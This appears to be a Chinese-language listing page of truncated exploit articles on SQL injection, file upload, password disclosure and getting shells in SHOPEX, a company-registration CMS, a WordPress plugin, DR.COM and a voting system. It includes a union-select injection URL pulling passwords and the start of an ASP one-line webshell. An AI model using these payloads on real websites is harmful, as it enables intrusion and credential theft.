-
SHOPEX 4.8.5 注入漏洞及后台拿shell
漏洞文件:漏洞核心函数 \core\model_v5\trading\mdl.goods.phpfunction gnotify($goods_id=0,$product_id=0){ if($_POST['goods']['good...
-
康城公司注册类网站系统cookies注入漏洞
康城公司注册类网站系统 v9.6cookies 注入中转http://www.xx.com/jmcook.asp?jmdcw=17+and 1=2 union select 1,2,password,4,5,password,7,8,9,1...
-
WordPress Sitemile Auctions插件任意文件上传漏洞
受影响系统:WordPress Sitemile Auctions Plugin 2.x描述:------------------------------------------------------------------------...
-
DR.COM城市热点GetPassword-0day漏洞&exp
DR.COM城市热点宽带,很多城市都用这个吧?市区,政府,企业,运营商,大学等等。。都用这套软件提供接入宽带服务 最近研究了下,发现个漏洞,在DR.COM USS用户自助服务登录的WEB服务器 可以直接查看到指定ID用户的密码,也就是查询密...
-
校无忧投票系统利用0day
后台拿shell的方法呢, 在网站配置的地方插入一句话,这个普通的一句话是不能用的要用变异的一句话,插入,测试成功 一句话: view sourceprint?1 "%><%execute(request("...
